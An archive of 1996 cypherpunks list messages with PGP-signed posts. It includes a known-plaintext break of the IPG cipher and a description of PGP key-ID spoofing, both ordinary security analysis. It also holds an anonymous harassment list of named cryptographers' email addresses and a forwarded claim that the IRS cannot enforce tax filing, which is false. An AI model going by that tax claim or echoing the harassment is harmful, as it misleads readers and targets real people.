LWN4Nv/6VoDaGPwLUDYL1BfHMIjO2tBnxP97UjnKP41c5uaqYEFc+z0LAx10G0WS
GiwnuMzJH+437tZHapE7RjJjlVqUEZi9PFhyawoPaJty90yJ1ZNzP38wjMWVTwY3
w7uLmZ8f5bs=
=VmM+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 20 Mar 1996 17:49:30 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: The return of the IPG Unbreakable System (fwd)
Message-ID: <2.2.32.19960319194333.00692c04@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:24 PM 03/19/96 -0600, you wrote:

... <sniveling excuses deleted> ...

>Accordingly, this will be the last letter posted to the entire 
>cypherpunks list for the time being. If any reader posts something to the 
>entire Cypherpunks list, do not expect any response to from IPG, there 
>will be none.

Thank you, thank you, thank you!

(see? there *is* a God!)

Dave Merriman
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMU7xkcVrTvyYOzAZAQGCSAQAj3wI2g4R6W8/iEhRaYn1y3SwfhS5g2UT
0BpdsUqNbJXA3Qbj4OlrT2SSWp7Glm4uymlJVM1AjXo36Jjo3XTZilMeTaVed5DW
idH8gfV/Wp6DJIPv3RqwtYysBur1pXgqmsEIEovIHhY7uP5yhW7JJL2NrZ/Dht4T
3DvZ/On3cdk=
=+acg
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 20 Mar 1996 20:05:02 +0800
To: cypherpunks@toad.com
Subject: Re: Keep the pressure! Cryptographers Against Cryptography EXPOSED!
Message-ID: <199603201013.CAA08914@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Some people have wondered why I am anonymous and attack me.
I am not ashamed of my views. I write this thread anonymous
as a form of protest.

The 10 PEOPLE on the LIST OF SHAME have their shields. The whole
government will come to their aid in helping them spread their
lie and is behind them.

I have an acount and post regularly under my real name. I am not
ashamed of my views. I am proud of them.

I write this anonyously as a form of protest because they have
there shield and we have our remailers. I WANT TO KEEP IT THAT WAY!
THEY MUST NOT BE ALOWED TO TAKE OUR SHIELD AWAY.

BOYCOTT THE SELLOUTS
AND
DO WHAT YOU HAVE TO DO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 20 Mar 1996 20:12:41 +0800
To: cypherpunks@toad.com
Subject: Keep the pressure! Cryptographers Against Cryptography EXPOSED!
Message-ID: <199603201016.CAA09094@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This is the third in a regular series of postings to expose
the lie that has become of the Leahy bill. I am proud to report that
the majority of us have the good sense to see this for what it is but
a few cypherpunks continue to lie to us and have not recanted. It is
too late to toss this up as a mistake in judgement.

We tried to educate these people on the error of their ways but
they persist in spreading the lie that the Leahy bill is good
for us. We tried to give them the benefit of the dout, but isn't
it funny that when presented with the facts NOT ONE OF THESE ""SCIENTISTS""
has admited to his CLEAR MISTAKE. No, they continue spreading the same
lie lie lie that the LEAHEY BILL WILL SOMEHOW HELP US.

THEY MUST BE STOPPED.

We can be fortunate that their number is small. At least the ones
we know about. Only three more since the last report. But even
one is too many.

These people have alot to answer for. Ask them who they work for
and who signs there checks. Ask them why they lie. Ask them why
they are afraid of your right to privacy. (of course we know why)
Show them HOW WE FEEL. Let them serve as examples too others if
they are too cowardly to serve as beacons for truth.

THE LIST OF SHAME:
B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
M. Blaze: mab@crypto.com, mab@research.att.com
J. Bizdos: jim@rsa.com
S. Safaddar: shabbir@vtw.org
D. Weinstein: djw@vplus.com
P.. Peterson: padgett@hobbes.orl.mmc.com
B. Stewart: stewarts@ix.netcom.com
B. Unicorn: unicorn@schloss.li
P. Karn: karn@unix.ka9q.ampr.org
D. McCullagh: declan@well.com

BOYCOTT APPLIED CRYPTOGRAPHY, AT&T, VTW, and RSA!!!!

THE LEAHY BILL IS 100% PART OF THE PLAN TO KILL FREE CRYPTO.
YOU DON'T NEED EXPERTS TO THINK FOR YOU! REMEMBER RICO AND WORLD GOVERNMENT!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Mar 1996 20:10:10 +0800
To: cypherpunks@toad.com
Subject: First encrypted online backup service?
Message-ID: <9603201027.AA18962@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually it looks like they're set up for modem access, but I
presume that if there's any serious demand they'd do it over the Internet.

Of course, Would You Trust Your Backups To This Man?  If the random
key generated for it was later found to be not random enough, or if
any of a dozen other bugs or breakthroughs make the encryption
penetrable, would you want to have transmitted every bit of data in
your computer, to a site you don't know very well, and to all
interested eavesdroppers?  Using proprietary and unverified software?
Or even using free software?

Maybe some reliable cypherpunk should run such a service.  Examine
what comes through and gets written on tape.  Superencipher it
yourself before writing it on tape, and keep your own keys securely;
maybe with a secret sharing scheme, and a tree of keys that requires
going offline to other backup tapes to recover the key for a
particular backup tape.  And as you look at your customers' data,
remember Robert Morris's #1 piece of advice to cryptanalysts: "Look
for plaintext".  It shows up in the darnedest places where it
shouldn't.  A c'punk backup service would warn you if you tried to
push plaintext into it.  Though it'd store it for you regardless: the
customer might care a lot more about being able to retain a copy of
their data than they care about whether anyone else could see it.

I hope they find a market and some workable solutions to these issues.
It'd be nice to have automatic backups of my data kept securely in a
few spots around the globe for some reasonable price.

	John Gilmore

Forwarded-by: Stanton McCandlish <mech@eff.org>
From: Alan Brown <abrown@usaor.net>
Newsgroups: comp.org.eff.news
Subject: Protect your computer data with remote tape backup.
Date: 13 Mar 1996 01:37:12 GMT
Organization: National Computer Company
Message-ID: <4i58s8$r65@news.usaor.net>
X-Mailer: Mozilla 1.1 (Windows; U; 16bit)
Content-Transfer-Encoding: quoted-printable

FACT

In the Next 3 Months
Another 30 Million Computers
Will Crash and Lose Data
*****************

This Year Alone Over
$1 Billion Worth Of Computers
Will Be Stolen
**********

Each Month
10 Million In-House Accidents,
Operator Error, Viruses
& Equipment Failure
Will Cause Loss Of Data
*****************

With National Computer & Data Back-up Company=92s technology we can safel=
y,=20
confidentially and automatically encrypt your data, download to our=20
server and store in our offsite water and fireproof vaults.

Our proprietary software is loaded on your computer and at a time that=20
you select, normally after business hours, your computer will=20
automatically call our server, compress and encrypt your files and=20
download the days work. We then download your files to tape and store in=20
our vaults in case of future need. Your files are encrypted and only you=20
have the password so noone but you can see your data. It is quick, safe,=20
reliable and you don=92t have the time consuming chore of doing backups.=20
For those outside the 412 area code we have an 800# for you to use to do=20
your backups so you won=92t have a toll charge.


Let us help you
For As Little As $2.00 Per Day

FOR MORE INFO
EMAIL US AT abrown@usaor.net
OR CALL US TODAY
412-934-0912




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Wed, 20 Mar 1996 18:48:41 +0800
To: "'Alan Olsen'" <alano@teleport.com>
Subject: RE: Microsoft's "answer" to Java
Message-ID: <01BB160E.8178A020@gate.bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Commenting on a quote from a magazine about MS's new 
code-download/wintrust stuff Alan Olsen wrote:

>As a web developer, I have some problems with this scheme.  Giving Microsoft
>access to virtually every OLE control on the Web does not make me more
>secure.  Sounds like a way to rip off ideas from the rest of the development
>world.  If someone has a control that might compete with a Microsoft
>product, it could be shelved and/or delayed for "further security testing".

I think you've been badly misled on this one.  I've just been through all of the 
related specs from the MS INetSDK. While they are still incomplete in places, 
they look pretty workable to me.  In particular the certainly don't suggest that
MS would be involved in signing anything.  To quote from the beta docs:

        The present tools therefore allow any user of this development release to
        authorize themselves as a "Software Publisher" for test purposes and to
        sign their code, allowing for extensive testing of the tools and code
        used but not actually providing a secure infrastructure. In future releases,
        the tools will require software publishers to obtain certificates from
        companies whose function is to verify the identity of the publishers,
        providing end-users with a high level of assurance about the authenticity
        and origin of code that they receive.

>Java has a decentralized mechanism for security.  No one group controls what
>is a "certified" control and what is not.  You write the code and compile it
>and that is that. Furthermore, you are not stuck with Microsoft approved
>platforms.  (I wonder if there will ever be a version of Explorer for the Mac.)

The current version (2.0) is already available on the Mac and the 3.0 alpha 
versions appear to be about equally buggy on both the Win32 and Mac
platforms.  (I haven't, on the other hand, heard any news of Unix versions.
Perhaps Bristol and/or Mainsoft will cover that port.)

================

Here's my quick overview of the specifications in question for those interested.

Microsoft is providing the following components:

- - A generic trust management called (ever originally) WinTrust.
  WinTrust provides an API to ask whether a given subject is trusted to perform
  a specific action.  The API is extensible in that multiple 'Trust Providers'
  can be installed and each can define the types of subjects and actions they
  manage.  The docs define the role of a 'Trust Administrator' who can configure
  the rules used by the trust provider services be neglect the give the details.
  
- - An implementation of a trust provider called the 'Windows Software Publishing
  Trust Provider'
  This provider supports subjects which are executable images and the action
  of 'being published software'.  The decision to trust is based on a PKCS #7
  embedded within the executable containing a signed digest from the author
  and a chain of X.507 certs back to some configurable set of CAs.  If the
  executable is not verified the user is prompted with the offer to approve it manually.

- - A set of developer tools for creating your certificate and signing executables.
  Note that the beta includes a hard-coded root CA key and all certs must
  trace back to it.  The existing library for munging executable images has
  also been enhanced to support adding, removing, enumerating and retrieving
  certs from an image as well as reading the stream that should be included in
  digest calculations.

- - A single function solution for browsers and other applications to download,
  verify, install, and create a class factory for an OLE object given an URL.
  In the web case the HTML <OBJECT> tag is used to embed an OLE object 
  in a page.  The browser tries to create it based on the CLSID attribute (which
  contains a DCE-ish uuid.)  If it fails it calls CoGetClassObjectFromURL() passing
  in the URL from the CODE attribute of the same tag.  This function does all the
  magic including the WinTrust call from above.  (Apparently there will also be
  support for an 'Internet Search Path' if the CODE attribute isn't specified.)

Then of course there is the MS CryptoAPI but that's a discussion for another day.

- -Blake (who hasn't worked for Microsoft for years now)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMU/Dirmr67p11D8rAQGHnQP/YI+EjCIcpBF3HQznruVBUkGsZls1ZVTf
SRvPJN7n+HrtvQ4WFSyAawsPnhRH183GTrtWAy+yhmmuzA6/Br/+rNJ/q0jSIlZw
w+RUsni9H9a7NsO1Y9xPQq//SHODYC0K+1vB6tU8XE56lZf9F0IZ4iP4El4PUWxD
7kXMboN1Nf0=
=5eH2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 20 Mar 1996 20:45:23 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Keep the pressure! Cryptographers Against Cryptography EXPOSED! (fwd)
Message-ID: <Pine.SUN.3.91.960320063655.17485B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 20 Mar 1996 anonymous-remailer@shell.portal.com wrote:

> These people have alot to answer for. Ask them who they work for
> and who signs there checks. Ask them why they lie. Ask them why
> they are afraid of your right to privacy. (of course we know why)
> Show them HOW WE FEEL. Let them serve as examples too others if
> they are too cowardly to serve as beacons for truth.
> 
> THE LIST OF SHAME:
> B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
> M. Blaze: mab@crypto.com, mab@research.att.com
> J. Bizdos: jim@rsa.com
> S. Safaddar: shabbir@vtw.org
> D. Weinstein: djw@vplus.com
> P.. Peterson: padgett@hobbes.orl.mmc.com
> B. Stewart: stewarts@ix.netcom.com
> B. Unicorn: unicorn@schloss.li

WOO HOO!  Took long enough.

> P. Karn: karn@unix.ka9q.ampr.org
> D. McCullagh: declan@well.com

> These people have alot to answer for. Ask them who they work for

The Executive Office on National Security in the Department of Justice.
Fred Baron is my boss.

> and who signs there checks.

All DOJ paychecks are government paychecks.  Duh.

> Ask them why they lie.

Because we know we can kill crypto for good if only we can keep you fools 
disorganized for a few more months.  Just... a... few... more....

>  Ask them why they are afraid of your right to privacy.

How the hell am I going to get my paycheck if we can't tax you?

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Munro Saunders <munro@ci.com.au>
Date: Wed, 20 Mar 1996 11:34:26 +0800
To: jpp@software.net (John Pettitt)
Subject: Re: IPG - newest release of the ABC Encryption Algorithms (fwd)
In-Reply-To: <2.2.32.19960319175044.00c7bab8@mail.software.net>
Message-ID: <199603192306.KAA02258@mippet.ci.com.au>
MIME-Version: 1.0
Content-Type: text/plain


> >IPG Sales wrote:
> >> Obviously, you meet our requirements for the release of the IPG ABC ...

> At 08:01 AM 3/19/96 -0600, Mike McNally wrote in reply:
> >On the other hand, the "algorithm" as presented is so hopelessly 
> >obfuscated by the strange terminology and loose descriptions used ...

John Pettitt presents us with C code possibily matching the algorithm
(see the end of this email).

I imagine that John Pettitt may have written:

> I do not endorse the above code or algorithm and make no comment on it's
> strength or otherwise.

Well I spent 30 seconds on it. Do we get to start with known plain text?
This is the usual assumption these days. It so hopeless I imagine more
experienced cryptographers won't even bother replying.

DON'T USE THIS CODE.

It has a long cycle: (the product of all the c[i]) * 64

It can be broken into 64 parts and each part attacked separately.
Each part is the outputs with offset i modulo 64. Part i has a cycle
of c[i]. (Its irrelevant that the b[i] are prime, helps if they are
coprime to c[i].) There is no feedback between parts.

Each part looks like a LCM PRNG to me. The cryptanalysis of these was
done decades ago by Knuth. From memory the key can be deduced in a
known plain text attack with knownledge of about the same amount of
plain text as there is unknown key (initial state). (under 1K bytes).

Even without known plain text I suspect it would not survive past the
maximum c[i] (given some redundancy in the input).

I imagine that John Pettitt may have written:

> Here is my take on a C version of their code - note that a[] b[] c[] and the
> initial d are filled in from the 'one time pad'.  The size of a,b,c is not
> specified it could be 8 16 or 32 bits from the text ...  However the initial
> values of a,b & c are set using 8 bits of the 'random' key.
> 
> int a[64]  /* Random & 0x3500 */
> int b[64]  /* Randomly selected primes */
> int c[64]  /* randomly selected primes*/
> char d;     /* random start value */
> int i;
> 
> /* the arrays b,c are filled in from tables of smallish primes supplied
> by IPG using 'random' numbers supplied by IPG to select the primes (and the
> order of same).  since all the values are > 8 bits I've assumed a,b,c = int. 
> a[] is filled with 13568 + an 8 bit 'random' number.  (13568 = 0x3500 which
> gets ANDed with the seed value)
> */
> 
> while(1)
> {
>         for(i=0; i<64;i++)
>         {
>                 a[i] = (a[i] + b[i]) % c[i];
>                 d = (d+a[i]) & 0xFF;
>                 /* output d as next byte in stream */
>                 /* XOR with plaintext */
>         }
> }

-- 
Munro Saunders    Often seen at Gracelands, but ...     P.O. Box 192,
munro@ci.com.au   I am not an official spokesperson     ERSKINEVILLE 2043
61 2 564 6368     for Elvis, IBM, M$ or Corinthian.     AUSTRALIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 21 Mar 1996 01:38:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603182057.VAA11926@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This came from Dave^H^H^H^HAnonymous in the context of that highly 
entertaining rec.music.white-power hullabaloo. What he was thinking 
cross-posting to alt.politics.white-power, I can't imagine.

The References: and Reply-To: headers are hilarious.

- -L. Detweiler
 alias Rich Graves
 FUCKING STATIST
 http://www.c2.org/~rich/

From: nobody@REPLAY.COM (Anonymous)
Newsgroups: news.groups,alt.politics.white-power,alt.2600
Subject: L. Detweilers's Back!!!    New nym: rich@c2.org  (Rich Graves)
Date: 16 Mar 1996 15:29:18 +0100
Sender: replay@utopia.hacktic.nl
Message-ID: <4iej7u$r6@utopia.hacktic.nl>
References: <rich@c2.org> lying asshole
Reply-To: <rich@c2.org> L. Detweiler
NNTP-Posting-Host: utopia.hacktic.nl
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 194       
XComm: Replay may or may not approve of the content of this posting
XComm: Report misuse of this automated service to <postmaster@REPLAY.COM>
Xref: nntp.Stanford.EDU alt.2600:179080 news.groups:126480

Give it up, "L"
We've got the glass on you


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMU3MjI3DXUbM57SdAQFBKwP9HCsustLeJGLqTzt9WCh2DM9/znj+Xl0E
aaidu28dpuhxdju/6phZ0uEHHXC/fUomH/dY5AXu3IaW68N6nLAXAl1TwJvd/dAh
JIjmchQpDptmH2039pFn0I/xTKO0nqqK/tMNYHC3v9HTwRxlR2nGUxh/vAUAKObf
tWbITC1fNPY=
=5/VC
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Lee Jeffers <gjeffers@ns.htc.net>
Date: Thu, 21 Mar 1996 19:59:27 +0800
To: cypherpunks@toad.com
Subject: Is the IRS a paper tiger?
Message-ID: <9603190816.AA31419@ns.htc.net>
MIME-Version: 1.0
Content-Type: text/plain


>From STRATEGIC INVESTMENT March 20, 1996

Strategic Investment
1217 St. Paul St.
Baltimore, MD
21202

It is published monthly for US$159 per year for U.S. residents (C$190
for Canadian residents and US$200 for other non-U.S. residents).

 behind the lines -  by Jack Wheeler

                        Is the IRS a paper tiger?

   One definition of a pioneer is a guy with an arrow in his back. So
notice the above headline is a question, not an assertion. But it is
nonetheless a question being asked by a lot of folks these days, from
Bill Archer, Chairman of House Ways & Means, to a number of smart tax
attorneys. The federal tax code has mutated into this gigantically in-
comprehensible Rube Goldberg monstrosity that day by day gets closer to
collapsing under its own weight. Couple that with the fact that the IRS
computer system is about to go belly up. The IRS originally computerized
itself AD HOC, with the regional centers getting various platforms and
software that can't communicate with each other very well. The agency has
now spent over $8 billion on the TSM project to re-computerize, which an
independent review recently concluded is a colossal failure.

   As the IRS teeters on the brink, a fellow named Eddie Kahn has stepped
forward and may be about to push the whole creaking mess over the edge.
He hasn't got an arrow in his back yet, so he might just succeed. Dis-
dainful of "tax protests" such as 5th Amendment or legal tender arguments
that quickly get their advocates behind bars, Eddie looked into the stru-
ture of federal law. When Congress passes a law, codified as a statute,
it then delegates to a regulatory agency the authority to issue the im-
plementing regulations specifiying to whom and under what circumstances
the statute applies. These regulations must, by law, be published in the
Federal Register. Lacking these implementing regulations, the law cannot
be applied and has no force. Well, it turns out that the implementing re-
gulations for IRS' enforcement statutes-things like the requirement to
file a tax return and the authority to place a lien-cannot be found in
the Federal Register. When queried on this, the General Counsel for the
Office of the Federal Register, Michael White, replied in writing, "Our
records indicate that the Internal Revenue Service has not incorporated
by reference in the Federal Register a requirement to make an income tax
return."

   This is starting to get interesting, isn't it? And yes, I see that big
smile on your face. If Eddie is right, the IRS has no assessment autho-
rity, no collection athority to enforce a lien or seize property, no au-
thority to pursue criminal penalties for failure to file a return or make
a false/fraudulent return. I am not at all suggesting you be a pioneer.
But if you should have any difficulty with the lovable folks at the IRS,
you might consider making an appointment to see them in person at their
nearest office, and tell them face to face that you need to see a copy
of the implementing regs published in the Federal Register that show
they have the authority to require you to do what they want. Not one of
the close to a thousand people who, following Eddie's advice, have done
so received a copy-and not one has been further harassed. Better to let
these folks drop out of the system quietly than risk a negative decision
in court, which would be for them an ultimate catastrophe. You can get
more info from Eddie at: 1-800-419-7512.
---------------------------------------------------------------------

                                             PUSH EM BACK! PUSH EM BACK!
                                             WWWAAAYYY  BBBAAACCCK!
                                             BBBEEEAAATTTT  STATE!

                                             Gary Jeffers

P.S. This reminds me of something else that I read a few months ago.
There is a book with the title The Law that Never Was - the 16th
Amendment (this was the title or close) that had a similar affect on
the IRS. I believe it was the SPOTLIGHT that said that when the then
Commissioner of the IRS found that the book was published, he gave
gave instructions that people citing the book in arguments with the IRS
be left alone. The 16th Amendment created the IRS.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: christopher@nescio.zerberus.de (Christopher Creutzig)
Date: Fri, 22 Mar 1996 19:08:33 +0800
To: cypherpunks@toad.com
Subject: PGP key spoofing
Message-ID: <Pine.LNX.3.91.960319123045.366I-100000@nescio.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello, everybody,

 (Please note that I sent this to several mailinglists at once. I am not 
subscribed to cypherpunks any longer, so I won't see any replies there.)

 I think I have realized a serious flaw in PGPs key-handling. This may 
lead to people using and signing bogus keys despite the usual security 
measures.

 The problem is that PGP fails to differentiate between two keys sharing 
the same 64-bit-Key-ID. It is not a real problem to generate a key with a 
given key-ID (just take a prime, invert the desired key-ID modulo this 
prime and look for another prime whose lower bits are the same as in the 
number you just calculated), so the following attack would be possible:

- Get the real key you wish to mimic.

- Generate a fake key with the correct IDs.

- Send your bogus key to a person of which you know that
  - This person does not have the correct key yet.
  - This person is going to meet the correct key's owner.

 If the owner of the correct key does not give a fingerprint, but rather 
a disk with the correct key to the person you are trying to fool, his or 
her pgp won't ring alarm bells when reading the key (apart from possibly 
a failed signature), but rather will tell him the key is already there. 
He will then, most probably, sign the bogus key without any further thought.

 Therefore, you should *always* check the fingerprint, even if you got 
the real key, at least if it has no valid signature from its alleged 
owner.

-- 
Christopher Creutzig # Im Samtfelde 19 # D-33098 Paderborn # V+49-5251-71873
 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
              Sammele Vorschläge zur Rettung vom Genitiv.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 21 Mar 1996 04:44:42 +0800
To: cypherpunks@toad.com
Subject: Re: IPG cracked with known plaintext
Message-ID: <2.2.32.19960319194316.00ce76e4@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 PM 3/19/96 GMT, ECafe Anonymous Remailer wrote:
>This information is preliminary and is based on an attempt to
>understand the IPG algorithm information.  That description is not
>clear in some areas, however, hence this analysis is tentative at this
>time.
>
>First let us describe the IPG system in more conventional C:
>
>a[0] to a[63] are initialized to random 8-bit values.  (The
>description is unclear and almost makes it sound like they are
>initialized to a random 8-bit value anded with 0x3500, which would of
>course be zero.  The attack below will assume that this bizarre step
>is not done, but will still apply even if it is.)
>

I think they mean ADD not AND but it's still an odd thing to do IMHO.


>So this algorithm is easily broken with known plaintext.
>
>
Agreed.   Given that most PC apps generate known headers on files
and that only a smallish plaintext is needed it's looks rather weak.

John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 21 Mar 1996 04:47:30 +0800
To: cypherpunks@toad.com
Subject: Microsoft's "answer" to Java
Message-ID: <2.2.32.19960319222247.008b833c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I recieved a copy of "Microsoft Interactive Developer" today in the mail.
In it, it has a preview of Microsoft Explorer 3.0. (Flux by David Boling on
page 120.)

Of interest to Cypherpunks is this paragraph (in the section on OLE support
in web browsers):

"Since OLE controls could potentially pose a security problem, Microsoft is
studying how to create an infrastructure to certify them.  The idea is that,
once certified, an OLE control would contain an RSA security signature
indicating that it has passed muster -- the OLE eqivelent if the Good
Housekeeping Seal of Approval! Users of Internet Explorer 3.0 could specify
whether or not noncertified OLE controls should be loaded and executed by
the browser."

As a web developer, I have some problems with this scheme.  Giving Microsoft
access to virtually every OLE control on the Web does not make me more
secure.  Sounds like a way to rip off ideas from the rest of the development
world.  If someone has a control that might compete with a Microsoft
product, it could be shelved and/or delayed for "further security testing".

Java has a decentralized mechanism for security.  No one group controls what
is a "certified" control and what is not.  You write the code and compile it
and that is that. Furthermore, you are not stuck with Microsoft approved
platforms.  (I wonder if there will ever be a version of Explorer for the Mac.)

I expect the Microsoft plan to garner a bit of resistance from the Web
development community over this one...

I do not expect to see many OLE crypto apps for the web with this plan.
 
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 21 Mar 1996 05:54:01 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: IPG - newest release of the ABC Encryption Algorithms (fwd)
In-Reply-To: <2.2.32.19960319175044.00c7bab8@mail.software.net>
Message-ID: <Pine.SOL.3.91.960319152014.17006A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Mar 1996, John Pettitt wrote:

my first gut reaction is that there looks like the scheme falls 
trivially to 64 bytes of known plaintext, but I didn't look at it closely.

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Thu, 21 Mar 1996 05:56:26 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: IPG cracked with known plaintext
In-Reply-To: <2.2.32.19960319194316.00ce76e4@mail.software.net>
Message-ID: <314F3855.6BCC@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


John Pettitt wrote:
> >a[0] to a[63] are initialized to random 8-bit values.  (The
> >description is unclear and almost makes it sound like they are
> >initialized to a random 8-bit value anded with 0x3500, which would of
> >course be zero.  The attack below will assume that this bizarre step
> >is not done, but will still apply even if it is.)
> >
> 
> I think they mean ADD not AND but it's still an odd thing to do IMHO.

Well, in the description it clearly says AND in two separate places, and
the surrounding verbage makes it seem like he really meant AND.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 21 Mar 1996 03:34:30 +0800
To: cypherpunks@toad.com
Subject: IPG cracked with known plaintext
Message-ID: <199603191732.RAA17262@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


This information is preliminary and is based on an attempt to
understand the IPG algorithm information.  That description is not
clear in some areas, however, hence this analysis is tentative at this
time.

First let us describe the IPG system in more conventional C:

a[0] to a[63] are initialized to random 8-bit values.  (The
description is unclear and almost makes it sound like they are
initialized to a random 8-bit value anded with 0x3500, which would of
course be zero.  The attack below will assume that this bizarre step
is not done, but will still apply even if it is.)

b[0] to b[63] are initialized to random primes selected from some
pool.  c[0] to c[63] are also initialized to random primes selected
from a different pool.

d is initialized to a random 8 bit value.

The algorithm is:

    for ( ; ; ) {
	for (i=0; i<63; i++) {
	    a[i] = (a[i] + b[i]) % c[i];
	    d = (d + a[i]) & 255;
	    *data++ ^= d;		/* xor with data */
	}
    }


Note first that with a known plaintext attack, the value of d can be
calculated for each iteration, simply by xor'ing the plaintext and
ciphertext.  So we can easily recover a series of d values under this
assumption.  Known plaintext is a plausible cryptographic assumption
in many contexts.

Note second that we can assume that b[i] is less than c[i].  It
appears from the description that this will be true, although it is a
little unclear.  If b[i] is greater than c[i] then simply do
b[i] = b[i] % c[i] before beginning the loop.  This will produce the
same results since (a + (b mod c)) mod c is equal to (a + b) mod c.

Note third that when a[i] and b[i], both less than c[i], are added mod
c[i], the result will be equal to one of two things: a[i]+b[i], or
a[i]+b[i]-c[i].  The reason is that the sum a[i]+b[i] must be less
than 2*c[i] so the "mod" operation will be at most a single
subtraction of c[i].  In general, half the time it will be necessary
to subtract c[i], and half the time it will not.

Now, as mentioned above, with known plaintext we can deduce the series
of d values.  Since each d differs from its predecessor by adding
a[i], this allows us to calculate the low 8 bits of a[i] simply by
taking the difference between successive d's.

Every 64 bytes, i repeats.  We know the low byte of a[i] from the
previous iteration, and we know it for this iteration.  Half of the
time (on average) a[i] will change simply by adding b[i], in which
case the low 8 bits will change by exactly the low 8 bits of b[i].  So
if we take the difference between a[i] values spaced 64 bytes apart,
half of the time these values will be a constant which is equal to the
low byte of b[i].

The other half the time, the low 8 bits will change by adding b[i] and
subtracting c[i].  So the low 8 bits of (b[i]-c[i]) is the other
possible constant value which will be seen when you take the
difference of a[i] every 64 bytes.

So with a few multiples of 64 bytes of known plaintext, you will
quickly find all the possible b[i] and b[i]-c[i] low bytes. By itself
this should significantly narrow down the possibilities for b[i] and
c[i], in many cases to a single prime.  Even without this the
algorithm can now be run forward or backward with only two possible
known changes to a[i] at each step, and the entire message can be
easily deduced.

So this algorithm is easily broken with known plaintext.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 21 Mar 1996 06:59:53 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Would the FTC crack down on snake oil someday?
